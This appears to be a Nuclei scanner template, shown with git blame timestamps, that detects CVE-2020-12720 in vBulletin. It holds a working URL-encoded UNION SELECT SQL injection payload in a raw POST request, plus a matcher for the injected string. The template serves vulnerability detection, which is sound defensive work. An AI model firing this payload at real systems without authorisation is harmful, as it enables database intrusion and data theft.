nuclei-templates/cves/2020/CVE-2020-12720.yaml

26 lines
885 B
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-12720
2020-05-21 21:47:20 +00:00
info:
name: CVE-2020-12720 vBulletin SQLI
2021-06-09 12:20:56 +00:00
author: pdteam
2020-05-21 21:47:20 +00:00
severity: critical
2020-08-25 22:52:00 +00:00
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
tags: cve,cve2020,vbulletin,sqli
2020-05-21 21:47:20 +00:00
requests:
- raw:
2020-05-25 07:49:06 +00:00
- |
2020-05-21 21:47:20 +00:00
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: {{Hostname}}
2021-09-09 06:12:52 +00:00
X-Requested-With: XMLHttpRequest
2020-05-21 21:47:20 +00:00
Accept: */*
Content-Type: application/x-www-form-urlencoded
2020-06-29 20:34:13 +00:00
2020-06-29 13:54:56 +00:00
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-
2020-06-29 20:34:13 +00:00
2020-05-21 21:47:20 +00:00
matchers:
- type: word
2020-05-25 07:49:06 +00:00
words:
2020-06-29 13:54:56 +00:00
- "vbulletinrce"